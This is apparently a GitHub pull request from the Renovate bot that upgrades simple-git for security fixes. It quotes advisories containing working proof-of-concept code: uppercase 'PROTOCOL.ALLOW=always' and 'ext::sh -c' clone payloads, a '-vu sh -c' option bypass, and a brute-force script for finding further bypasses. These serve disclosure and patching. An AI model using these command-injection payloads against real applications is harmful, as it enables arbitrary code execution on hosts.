Skip to content

chore(monorepo): update pnpm-workspace.overrides simple-git to >=3.36.0 [security] - #216

Open
renovate[bot] wants to merge 1 commit into
mainfrom
renovate/npm-simple-git-vulnerability
Open

renovate[bot] wants to merge 1 commit into
mainfrom
renovate/npm-simple-git-vulnerability

Conversation

@renovate

@renovate renovate Bot commented Apr 9, 2026 •

Copy link
Copy Markdown
Contributor

This PR contains the following updates:

Package Change Age Confidence
simple-git (source) >=3.27.0 → >=3.36.0 age confidence

simple-git has blockUnsafeOperationsPlugin bypass via case-insensitive protocol.allow config key enables RCE

CVE-2026-28292 / GHSA-r275-fr43-pm7q

More information

Details

Summary

The blockUnsafeOperationsPlugin in simple-git fails to block git protocol
override arguments when the config key is passed in uppercase or mixed case.
An attacker who controls arguments passed to git operations can enable the
ext:: protocol by passing -c PROTOCOL.ALLOW=always, which executes an
arbitrary OS command on the host machine.


Details

The preventProtocolOverride function in
simple-git/src/lib/plugins/block-unsafe-operations-plugin.ts (line 24)
checks whether a -c argument configures protocol.allow using this regex:

if (!/^\s*protocol(.[a-z]+)?.allow/.test(next)) {
   return;
}

This regex is case-sensitive. Git treats config key names
case-insensitively — it normalises them to lowercase internally.
As a result, passing PROTOCOL.ALLOW=always, Protocol.Allow=always,
or any mixed-case variant is not matched by the regex, the check
returns without throwing, and git is spawned with the unsafe argument.

Verification that git normalises the key:

$ git -c PROTOCOL.ALLOW=always config --list | grep protocol
protocol.allow=always

The fix is a single character — add the /i flag:

// Before (vulnerable):
if (!/^\s*protocol(.[a-z]+)?.allow/.test(next)) {

// After (fixed):
if (!/^\s*protocol(.[a-z]+)?.allow/i.test(next)) {

poc.js
/**
 * Proof of Concept — simple-git preventProtocolOverride Case-Sensitivity Bypass
 *
 * CVE-2022-25912 was fixed in simple-git@3.15.0 by adding a regex check
 * that blocks `-c protocol.*.allow=always` from being passed to git commands.
 * The regex is case-sensitive. Git treats config key names case-insensitively.
 * Passing `-c PROTOCOL.ALLOW=always` bypasses the check entirely.
 *
 * Affected : simple-git >= 3.15.0 (all versions with the fix applied)
 * Tested on: simple-git@3.32.2, Node.js v23.11.0, git 2.39.5
 * Reporter : CodeAnt AI Security Research (securityreseach@codeant.ai)
 */

const simpleGit = require('simple-git');
const fs = require('fs');

const SENTINEL = '/tmp/pwn-codeant';

// Clean up from any previous run
try { fs.unlinkSync(SENTINEL); } catch (_) {}

const git = simpleGit();

// ── Original CVE-2022-25912 vector — BLOCKED by the 2022 fix ────────────────
// This is the exact PoC Snyk used to report CVE-2022-25912.
// It is correctly blocked by preventProtocolOverride in block-unsafe-operations-plugin.ts.
git.clone('ext::sh -c touch% /tmp/pwn-original% >&2', '/tmp/example-new-repo', [
  '-c', 'protocol.ext.allow=always',   // lowercase — caught by regex
]).catch((e) => {
  console.log('ext:: executed:poc', fs.existsSync(SENTINEL) ? 'PWNED — ' + SENTINEL + ' created' : 'not created');
  console.error(e);
});

// ── Bypass — PROTOCOL.ALLOW=always (uppercase) ──────────────────────────────
// The fix regex /^\s*protocol(.[a-z]+)?.allow/ is case-sensitive.
// Git normalises config key names to lowercase internally.
// Uppercase variant passes the check; git enables ext:: and executes the command.
git.clone('ext::sh -c touch% ' + SENTINEL + '% >&2', '/tmp/example-new-repo-2', [
  '-c', 'PROTOCOL.ALLOW=always',       // uppercase — NOT caught by regex
]).catch((e) => {
  console.log('ext:: executed:', fs.existsSync(SENTINEL) ? 'PWNED — ' + SENTINEL + ' created' : 'not created');
  console.error(e);
});

// ── Real-world scenario ──────────────────────────────────────────────────────
// An application cloning a legitimate repository with user-controlled customArgs.
// Attacker supplies PROTOCOL.ALLOW=always alongside a malicious ext:: URL.
// The application intends to clone https://github.com/CodeAnt-AI/codeant-quality-gates
// but the injected argument enables ext:: and the real URL executes the command instead.
//
// Legitimate usage (what the app expects):
//   simpleGit().clone('https://github.com/CodeAnt-AI/codeant-quality-gates',
//                     '/tmp/codeant-quality-gates', userArgs)
//
// Attacker-controlled scenario (what actually runs when args are not sanitised):
const LEGITIMATE_URL = 'https://github.com/CodeAnt-AI/codeant-quality-gates';
const CLONE_DEST     = '/tmp/codeant-quality-gates';
const SENTINEL_RW    = '/tmp/pwn-realworld';
try { fs.unlinkSync(SENTINEL_RW); } catch (_) {}

const userArgs   = ['-c', 'PROTOCOL.ALLOW=always'];
const attackerURL = 'ext::sh -c touch% ' + SENTINEL_RW + '% >&2';

simpleGit().clone(
  attackerURL,   // should have been LEGITIMATE_URL
  CLONE_DEST,
  userArgs
).catch(() => {
  console.log('real-world scenario [target: ' + LEGITIMATE_URL + ']:',
    fs.existsSync(SENTINEL_RW) ? 'PWNED — ' + SENTINEL_RW + ' created' : 'not created');
});

Test Results
Vector 1 — Original CVE-2022-25912 (protocol.ext.allow=always, lowercase)

Result: BLOCKED ✅

The original Snyk PoC payload using lowercase protocol.ext.allow=always is correctly intercepted by preventProtocolOverride before git is invoked. A GitPluginError is thrown immediately and the sentinel file is never created.

Output:

ext:: executed:poc not created
GitPluginError: Configuring protocol.allow is not permitted without enabling allowUnsafeExtProtocol
    at preventProtocolOverride (.../simple-git/dist/cjs/index.js:1228:9)
    at .../simple-git/dist/cjs/index.js:1266:40
    at Array.forEach (<anonymous>)
    at Object.action (.../simple-git/dist/cjs/index.js:1264:12)
    at PluginStore.exec (.../simple-git/dist/cjs/index.js:1489:29)
    at GitExecutorChain.attemptRemoteTask (.../simple-git/dist/cjs/index.js:1881:36)
    at GitExecutorChain.attemptTask (.../simple-git/dist/cjs/index.js:1865:88) {
  task: {
    commands: [
      'clone',
      '-c',
      'protocol.ext.allow=always',
      'ext::sh -c touch% /tmp/pwn-original% >&2',
      '/tmp/example-new-repo'
    ],
    format: 'utf-8',
    parser: [Function: parser]
  },
  plugin: 'unsafe'
}

Vector 2 — Uppercase bypass (PROTOCOL.ALLOW=always)

Result: BYPASSED ⚠️ — RCE confirmed

The preventProtocolOverride regex /^\s*protocol(.[a-z]+)?.allow/ is case-sensitive. PROTOCOL.ALLOW=always (uppercase) passes the check without error. Git normalises config key names to lowercase internally, enabling the ext:: protocol. The injected shell command executes before git errors on the missing repository stream.

Output:

ext:: executed: PWNED — /tmp/pwn-codeant created
GitError: Cloning into '/tmp/example-new-repo-2'...
fatal: Could not read from remote repository.

Please make sure you have the correct access rights
and the repository exists.

    at Object.action (.../simple-git/dist/cjs/index.js:1440:25)
    at PluginStore.exec (.../simple-git/dist/cjs/index.js:1489:29) {
  task: {
    commands: [
      'clone',
      '-c',
      'PROTOCOL.ALLOW=always',
      'ext::sh -c touch% /tmp/pwn-codeant% >&2',
      '/tmp/example-new-repo-2'
    ],
    format: 'utf-8',
    parser: [Function: parser]
  }
}

/tmp/pwn-codeant was created by the git subprocess — command execution confirmed.


Vector 3 — Real-world scenario (target: https://github.com/CodeAnt-AI/codeant-quality-gates)

Result: BYPASSED ⚠️ — RCE confirmed

An application passes user-controlled customArgs to simpleGit().clone(). The attacker injects PROTOCOL.ALLOW=always and substitutes a malicious ext:: URL in place of the intended repository URL. The plugin does not block the uppercase variant; git enables ext:: and executes the payload before the application can detect the failure.

Output:

real-world scenario [target: https://github.com/CodeAnt-AI/codeant-quality-gates]: PWNED — /tmp/pwn-realworld created

/tmp/pwn-realworld was created — arbitrary command execution in a realistic application context confirmed.


Summary
# Vector Payload Sentinel file Result
1 CVE-2022-25912 original protocol.ext.allow=always (lowercase) not created Blocked ✅
2 Case-sensitivity bypass PROTOCOL.ALLOW=always (uppercase) /tmp/pwn-codeant created RCE ⚠️
3 Real-world app scenario PROTOCOL.ALLOW=always + attacker URL /tmp/pwn-realworld created RCE ⚠️

The case-sensitive regex in preventProtocolOverride blocks protocol.*.allow but does not account for uppercase or mixed-case variants. Git accepts all variants identically due to case-insensitive config key normalisation, allowing full bypass of the protection in all versions of simple-git that carry the 2022 fix.

/tmp/pwned is created by the git subprocess via the ext:: protocol.

All of the following bypass the check:

Argument passed via -c Regex matches? Git honours it?
protocol.allow=always ✅ blocked ✅
PROTOCOL.ALLOW=always ❌ bypassed ✅
Protocol.Allow=always ❌ bypassed ✅
PROTOCOL.allow=always ❌ bypassed ✅
protocol.ALLOW=always ❌ bypassed ✅

Impact

Any application that passes user-controlled values into the customArgs
parameter of clone(), fetch(), pull(), push() or similar simple-git
methods is vulnerable to arbitrary command execution on the host machine.

The ext:: git protocol executes an arbitrary binary as a remote helper.
With protocol.allow=always enabled, an attacker can run any OS command
as the process user — full read, write and execution access on the host.

Severity

  • CVSS Score: 9.8 / 10 (Critical)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


simple-git Affected by Command Execution via Option-Parsing Bypass

CVE-2026-28291 / GHSA-jcxm-m3jx-f287

More information

Details

Summary

simple-git enables running native Git commands from JavaScript. Some commands accept options that allow executing another command; because this is very dangerous, execution is denied unless the user explicitly allows it. This vulnerability allows a malicious actor who can control the options to execute other commands even in a “safe” state where the user has not explicitly allowed them. The vulnerability was introduced by an incorrect patch for CVE-2022-25860. It is likely to affect all versions prior to and including 3.28.0.

Detail

This vulnerability was introduced by an incorrect patch for CVE-2022-25860.

It was reproduced in the following environment:


WSL Docker
node: v22.19.0
git: git version 2.39.5
simple-git: 3.28.0

The issue was not reproduced on Windows 11.

The -u option, like --upload-pack, allows a command to be executed.

Currently, the -u and --upload-pack options are blocked in the file simple-git/src/lib/plugins/block-unsafe-operations-plugin.ts.

function preventUploadPack(arg: string, method: string) {
   if (/^\s*--(upload|receive)-pack/.test(arg)) {
      throw new GitPluginError(
         undefined,
         'unsafe',
         `Use of --upload-pack or --receive-pack is not permitted without enabling allowUnsafePack`
      );
   }

   if (method === 'clone' && /^\s*-u\b/.test(arg)) {
      throw new GitPluginError(
         undefined,
         'unsafe',
         `Use of clone with option -u is not permitted without enabling allowUnsafePack`
      );
   }

   if (method === 'push' && /^\s*--exec\b/.test(arg)) {
      throw new GitPluginError(
         undefined,
         'unsafe',
         `Use of push with option --exec is not permitted without enabling allowUnsafePack`
      );
   }
}

However, the problem is that command option parsing is quite flexible.

By brute forcing, I found various options that bypass the -u check.

[
  '--u', '--u',
  '-4u', '-6u',
  '-lu', '-nu',
  '-qu', '-su',
  '-vu'
]

All of the above are three-character options that allow command execution. They enable execution even when allowUnsafePack is explicitly set to false.

The depressing fact is that the options I found are probably only a tiny fraction of all possible option formats that enable command execution. In addition to the -u option, there is also the --upload-pack option and others, and some of the options I found can probably be extended to arbitrary length. Considering this, the number of option variants that enable command execution is probably infinite.

Therefore, I could not find an effective way to block all such cases. Personally, I think it is virtually impossible to block this vulnerability completely. To fully block it, one would have to faithfully emulate Git’s option parsing rules, and it’s doubtful whether that is feasible.

Just in case, I’ll share the brute-force code I used to find options that enable command execution.

const fs = require('fs');
const simpleGit = require('simple-git');

const TMP_DIR = './pwned/';
const ITER = 256;

function cleanTmpDir() {
    if (fs.existsSync(TMP_DIR)) {
        fs.rmSync(TMP_DIR, { recursive: true, force: true });
    }
    fs.mkdirSync(TMP_DIR, { recursive: true });
}

function getPwnedFiles() {
    const found = [];
    for (let i = 0; i < ITER; i++) {
        const fname1 = `${TMP_DIR}1_${i}`;
        const fname2 = `${TMP_DIR}2_${i}`;
        const fname3 = `${TMP_DIR}3_${i}`;
        if (fs.existsSync(fname1)) found.push(String.fromCharCode(i) + '-u');
        if (fs.existsSync(fname2)) found.push('-' + String.fromCharCode(i) + 'u');
        if (fs.existsSync(fname3)) found.push('-u' + String.fromCharCode(i));
    }
    return found;
}

async function runTest(runIdx) {
    const git = simpleGit();
    // 1. `${~}-u` Pattern
    for (let i = 0; i < ITER; i++) {
        try {
            await git.clone('./testrepo1', './testrepo2', [String.fromCharCode(i) + '-u', `sh -c \"touch ${TMP_DIR}1_${i}\"`]);
        } catch {}
    }
    // 2. `-${~}u` Pattern
    for (let i = 0; i < ITER; i++) {
        try {
            await git.clone('./testrepo1', './testrepo2', ['-' + String.fromCharCode(i) + 'u', `sh -c \"touch ${TMP_DIR}2_${i}\"`]);
        } catch {}
    }
    // 3. `-u${~}` Pattern
    for (let i = 0; i < ITER; i++) {
        try {
            await git.clone('./testrepo1', './testrepo2', ['-u' + String.fromCharCode(i), `sh -c \"touch ${TMP_DIR}3_${i}\"`]);
        } catch {}
    }
}

async function main() {
    cleanTmpDir();
    await runTest();

    const found = getPwnedFiles();
    
    console.log(found);
}

main();
PoC

The environment in which I succeeded is as follows. As long as the OS remains Linux, I suspect it will succeed reliably despite considerable variation in other factors.

WSL Docker
node: v22.19.0
git: git version 2.39.5
simple-git: 3.28.0

Create any git repository inside the testrepo1 folder. A very simple repository with a single commit and a single file is fine.

Run the following:

const { simpleGit } = require('simple-git');

async function main() {
    const git = await simpleGit({ unsafe: { allowUnsafePack: false } });
    await git.clone('./testrepo1', './testrepo2', [`-vu sh -c \"touch /tmp/pwned\"`]);
}

main();

This PoC explicitly configures allowUnsafePack to false. Of course, the same vulnerability occurs even without this option. An error is the expected behavior.

Check /tmp to confirm that pwned has been created.
If it failed, try replacing -vu with a different option from the list.

Impact

This vulnerability is likely to affect all versions prior to and including 3.28.0. This is because it appears to be a continuation of the series of four vulnerabilities previously found in simple-git (CVE-2022-24433, CVE-2022-24066, CVE-2022-25912, CVE-2022-25860).

Severity

  • CVSS Score: 8.1 / 10 (High)
  • Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


simple-git is vulnerable to Remote Code Execution

CVE-2026-6951 / GHSA-hffm-xvc3-vprc

More information

Details

Versions of the package simple-git before 3.36.0 are vulnerable to Remote Code Execution (RCE) due to an incomplete fix for CVE-2022-25912 that blocks the -c option but not the equivalent --config form. If untrusted input can reach the options argument passed to simple-git, an attacker may still achieve remote code execution by enabling protocol.ext.allow=always and using an ext:: clone source.

Severity

  • CVSS Score: 8.2 / 10 (High)
  • Vector String: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


Release Notes

steveukx/git-js (simple-git)

v3.36.0

Compare Source

Minor Changes
  • 89a2294: Extend known exploitable configuration keys and per-task environment variables.

    Note - ParsedVulnerabilities from argv-parser is removed in favour of a readonly array of Vulnerability to match usage in simple-git, rolled into the new vulnerabilityCheck for simpler access to the identified issues.

    Thanks to @​zebbern for identifying the need to block core.fsmonitor.
    Thanks to @​kodareef5 for identifying the need to block GIT_CONFIG_COUNT environment variables and --template / merge related config.

Patch Changes

v3.35.2

Compare Source

Patch Changes

v3.35.1

Compare Source

Patch Changes

v3.35.0

Compare Source

Minor Changes
Patch Changes

v3.34.0

Compare Source

Minor Changes
  • 2b68331: Revised dependency tree to add helper modules as dependencies in main simple-git
Patch Changes
  • 2e1f51c: Enhances scanning of arguments before passing on to the spawned child_process.

    Caters for -c flags prefixing the git task (used when setting global inline config) and suffixing with either -c, --config or --config-env. Detects git config operations that write to the configuration.

  • Updated dependencies [2e1f51c]

v3.33.0

Compare Source

Minor Changes
  • a263635: Use pathspec wrappers for remote and local paths when running either git.clone or git.mirror to
    avoid leaving them less open for unexpected outcomes when passing unsanitised data into these tasks.
Patch Changes

v3.32.3

Compare Source

Patch Changes

v3.32.2

Compare Source

Patch Changes
  • 8d02097: Enhanced clone unsafe switch detection.

v3.32.1

Compare Source

Patch Changes
  • 23b070f: Fix regex for detecting unsafe clone options

    Thanks to @​stevenwdv for reporting this issue.

v3.32.0

Compare Source

Minor Changes
  • 1effd8e: Enhances the unsafe plugin to block additional cases where the -u switch may be disguised
    along with other single character options.

    Thanks to @​JuHwiSang for identifying this as vulnerability.

Patch Changes
  • d5fd4fe: Use task runner for logging use of deprecated (already no-op) functions.

v3.31.1

Compare Source

Patch Changes
  • a44184f: Resolve NPM publish steps

v3.30.0

Compare Source

Minor Changes
  • bc77774: Correctly identify current branch name when using git.status in a cloned empty repo.

    Previously git.status would report the current branch name as No. Thank you to @​MaddyGuthridge for identifying this issue.

v3.29.0

Compare Source

Minor Changes
  • 240ec64: Support for absolute paths on Windows when using git.checkIngore, previously Windows would report
    paths with duplicate separators \\\\ between directories.

    Following this change all paths returned from git.checkIgnore will be normalized through node:path,
    this should have no impact on non-windows users where the git binary doesn't wrap absolute paths with
    quotes.

    Thanks to @​Maxim-Mazurok for reporting this issue.

  • 9872f84: Support the use of git.branch(['--show-current']) to limit the branch list to only the current branch.

    Thanks to @​peterbe for pointing out the use-case.

  • 5736bd8: Change to biome for lint and format

v3.28.0

Compare Source

Minor Changes
  • 2adf47d: Allow repeating git options like {'--opt': ['value1', 'value2']}

Configuration

📅 Schedule: (in timezone America/New_York)

  • Branch creation
    • At any time (no schedule defined)
  • Automerge
    • At any time (no schedule defined)

🚦 Automerge: Enabled.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.


  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

@renovate
renovate Bot enabled auto-merge (squash) April 9, 2026 05:14
@renovate

renovate Bot commented Apr 9, 2026

Copy link
Copy Markdown
Contributor Author

Branch automerge failure

This PR was configured for branch automerge. However, this is not possible, so it has been raised as a PR instead.

@renovate
renovate Bot requested a review from a team April 9, 2026 05:14
@renovate
renovate Bot requested review from a team and sullivanpj as code owners April 9, 2026 05:14
@deepsource-io

deepsource-io Bot commented Apr 9, 2026 •

Copy link
Copy Markdown

DeepSource Code Review

We reviewed changes in 242a5a8...016f084 on this pull request. Below is the summary for the review, and you can see the individual issues we found as inline review comments.

See full review on DeepSource ↗

PR Report Card

Overall Grade   Security  

Reliability  

Complexity  

Hygiene  

Code Review Summary

Analyzer Status Updated (UTC) Details
JavaScript Oct 3, 2026 11:34p.m. Review ↗
Shell Oct 3, 2026 11:34p.m. Review ↗

Important

AI Review is run only on demand for your team. We're only showing results of static analysis review right now. To trigger AI Review, comment @deepsourcebot review on this thread.

@renovate
renovate Bot force-pushed the renovate/npm-simple-git-vulnerability branch from 65788ec to 8aca30a Compare April 15, 2026 09:57
@renovate renovate Bot changed the title chore(monorepo): update pnpm-workspace.overrides simple-git to >=3.32.3 [security] chore(monorepo): update pnpm-workspace.overrides simple-git to >=3.36.0 [security] Apr 15, 2026
@renovate renovate Bot changed the title chore(monorepo): update pnpm-workspace.overrides simple-git to >=3.36.0 [security] chore(monorepo): update pnpm-workspace.overrides simple-git to >=3.32.3 [security] Apr 16, 2026
@renovate
renovate Bot force-pushed the renovate/npm-simple-git-vulnerability branch from 8aca30a to 2168373 Compare April 16, 2026 10:38
@socket-security

socket-security Bot commented Apr 16, 2026 •

Copy link
Copy Markdown

All alerts resolved. Learn more about Socket for GitHub.

This PR previously contained dependency changes with security issues that have been resolved, removed, or ignored.

View full report

@renovate renovate Bot changed the title chore(monorepo): update pnpm-workspace.overrides simple-git to >=3.32.3 [security] chore(monorepo): update pnpm-workspace.overrides simple-git to >=3.36.0 [security] Apr 16, 2026
@renovate
renovate Bot force-pushed the renovate/npm-simple-git-vulnerability branch 2 times, most recently from 5fa3daa to 84ff3b5 Compare April 16, 2026 21:21
@renovate renovate Bot changed the title chore(monorepo): update pnpm-workspace.overrides simple-git to >=3.36.0 [security] chore(monorepo): update pnpm-workspace.overrides simple-git to >=3.32.3 [security] Apr 16, 2026
@renovate
renovate Bot force-pushed the renovate/npm-simple-git-vulnerability branch from 84ff3b5 to 2a6c6de Compare April 21, 2026 21:52
@renovate renovate Bot changed the title chore(monorepo): update pnpm-workspace.overrides simple-git to >=3.32.3 [security] chore(monorepo): update pnpm-workspace.overrides simple-git to >=3.36.0 [security] Apr 21, 2026
@renovate
renovate Bot force-pushed the renovate/npm-simple-git-vulnerability branch from 2a6c6de to e3fdd29 Compare April 22, 2026 03:15
@renovate renovate Bot changed the title chore(monorepo): update pnpm-workspace.overrides simple-git to >=3.36.0 [security] chore(monorepo): update pnpm-workspace.overrides simple-git to >=3.32.3 [security] Apr 22, 2026
@renovate renovate Bot changed the title chore(monorepo): update pnpm-workspace.overrides simple-git to >=3.32.3 [security] chore(monorepo): update pnpm-workspace.overrides simple-git to >=3.36.0 [security] Apr 23, 2026
@renovate
renovate Bot force-pushed the renovate/npm-simple-git-vulnerability branch from e3fdd29 to c9792f7 Compare April 23, 2026 11:52
@renovate renovate Bot changed the title chore(monorepo): update pnpm-workspace.overrides simple-git to >=3.36.0 [security] chore(monorepo): update pnpm-workspace.overrides simple-git to >=3.32.3 [security] Apr 23, 2026
@renovate
renovate Bot force-pushed the renovate/npm-simple-git-vulnerability branch from c9792f7 to c536f2a Compare April 23, 2026 14:36
@renovate renovate Bot changed the title chore(monorepo): update pnpm-workspace.overrides simple-git to >=3.32.3 [security] chore(monorepo): update pnpm-workspace.overrides simple-git to >=3.32.3 [security] - autoclosed Apr 27, 2026
@renovate renovate Bot closed this Apr 27, 2026
auto-merge was automatically disabled April 27, 2026 17:55

Pull request was closed

@renovate
renovate Bot deleted the renovate/npm-simple-git-vulnerability branch April 27, 2026 17:55
@renovate renovate Bot changed the title chore(monorepo): update pnpm-workspace.overrides simple-git to >=3.32.3 [security] - autoclosed chore(monorepo): update pnpm-workspace.overrides simple-git to >=3.32.3 [security] Apr 27, 2026
@renovate renovate Bot reopened this Apr 27, 2026
@renovate
renovate Bot force-pushed the renovate/npm-simple-git-vulnerability branch from 40105b1 to c536f2a Compare April 27, 2026 21:59
@renovate
renovate Bot force-pushed the renovate/npm-simple-git-vulnerability branch 2 times, most recently from 5faf65f to d43b9c4 Compare May 14, 2026 20:48
@renovate renovate Bot changed the title chore(monorepo): update pnpm-workspace.overrides simple-git to >=3.36.0 [security] chore(monorepo): update pnpm-workspace.overrides simple-git to >=3.32.3 [security] May 14, 2026
@renovate
renovate Bot force-pushed the renovate/npm-simple-git-vulnerability branch from d43b9c4 to 70ea9a7 Compare May 18, 2026 12:39
@renovate renovate Bot changed the title chore(monorepo): update pnpm-workspace.overrides simple-git to >=3.32.3 [security] chore(monorepo): update pnpm-workspace.overrides simple-git to >=3.36.0 [security] May 18, 2026
@renovate
renovate Bot force-pushed the renovate/npm-simple-git-vulnerability branch from 70ea9a7 to 95401c0 Compare May 18, 2026 21:54
@renovate renovate Bot changed the title chore(monorepo): update pnpm-workspace.overrides simple-git to >=3.36.0 [security] chore(monorepo): update pnpm-workspace.overrides simple-git to >=3.32.3 [security] May 18, 2026
@renovate
renovate Bot force-pushed the renovate/npm-simple-git-vulnerability branch from 95401c0 to 13146ff Compare May 22, 2026 21:06
@renovate renovate Bot changed the title chore(monorepo): update pnpm-workspace.overrides simple-git to >=3.32.3 [security] chore(monorepo): update pnpm-workspace.overrides simple-git to >=3.36.0 [security] May 22, 2026
@renovate
renovate Bot force-pushed the renovate/npm-simple-git-vulnerability branch from 13146ff to 3769a8c Compare May 23, 2026 01:57
@renovate renovate Bot changed the title chore(monorepo): update pnpm-workspace.overrides simple-git to >=3.36.0 [security] chore(monorepo): update pnpm-workspace.overrides simple-git to >=3.32.3 [security] May 23, 2026
@renovate
renovate Bot force-pushed the renovate/npm-simple-git-vulnerability branch from 3769a8c to 056c3bd Compare May 28, 2026 17:44
@renovate renovate Bot changed the title chore(monorepo): update pnpm-workspace.overrides simple-git to >=3.32.3 [security] chore(monorepo): update pnpm-workspace.overrides simple-git to >=3.36.0 [security] May 28, 2026
@renovate
renovate Bot force-pushed the renovate/npm-simple-git-vulnerability branch from 056c3bd to d3eea4a Compare May 28, 2026 23:10
@renovate renovate Bot changed the title chore(monorepo): update pnpm-workspace.overrides simple-git to >=3.36.0 [security] chore(monorepo): update pnpm-workspace.overrides simple-git to >=3.32.3 [security] May 28, 2026
@renovate
renovate Bot force-pushed the renovate/npm-simple-git-vulnerability branch from d3eea4a to 68f910a Compare June 1, 2026 20:17
@renovate renovate Bot changed the title chore(monorepo): update pnpm-workspace.overrides simple-git to >=3.32.3 [security] chore(monorepo): update pnpm-workspace.overrides simple-git to >=3.36.0 [security] Jun 1, 2026
@renovate
renovate Bot force-pushed the renovate/npm-simple-git-vulnerability branch from 68f910a to 78d1573 Compare June 2, 2026 01:59
@renovate renovate Bot changed the title chore(monorepo): update pnpm-workspace.overrides simple-git to >=3.36.0 [security] chore(monorepo): update pnpm-workspace.overrides simple-git to >=3.32.3 [security] Jun 2, 2026
@renovate
renovate Bot force-pushed the renovate/npm-simple-git-vulnerability branch from 78d1573 to 9f3d890 Compare June 11, 2026 11:15
@renovate renovate Bot changed the title chore(monorepo): update pnpm-workspace.overrides simple-git to >=3.32.3 [security] chore(monorepo): update pnpm-workspace.overrides simple-git to >=3.36.0 [security] Jun 11, 2026
@renovate renovate Bot changed the title chore(monorepo): update pnpm-workspace.overrides simple-git to >=3.36.0 [security] chore(monorepo): update pnpm-workspace.overrides simple-git to >=3.32.3 [security] Jun 11, 2026
@renovate
renovate Bot force-pushed the renovate/npm-simple-git-vulnerability branch from 9f3d890 to 8f108b1 Compare June 11, 2026 22:14
@renovate renovate Bot changed the title chore(monorepo): update pnpm-workspace.overrides simple-git to >=3.32.3 [security] chore(monorepo): update pnpm-workspace.overrides simple-git to >=3.36.0 [security] Jun 18, 2026
@renovate
renovate Bot force-pushed the renovate/npm-simple-git-vulnerability branch from 8f108b1 to 6cbaf7e Compare June 18, 2026 18:49
@renovate
renovate Bot force-pushed the renovate/npm-simple-git-vulnerability branch from 6cbaf7e to 18091a7 Compare June 19, 2026 01:00
@renovate renovate Bot changed the title chore(monorepo): update pnpm-workspace.overrides simple-git to >=3.36.0 [security] chore(monorepo): update pnpm-workspace.overrides simple-git to >=3.32.3 [security] Jun 19, 2026
@renovate
renovate Bot force-pushed the renovate/npm-simple-git-vulnerability branch from 18091a7 to b0a1632 Compare July 11, 2026 17:09

This branch has not been deployed

No deployments
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

0 participants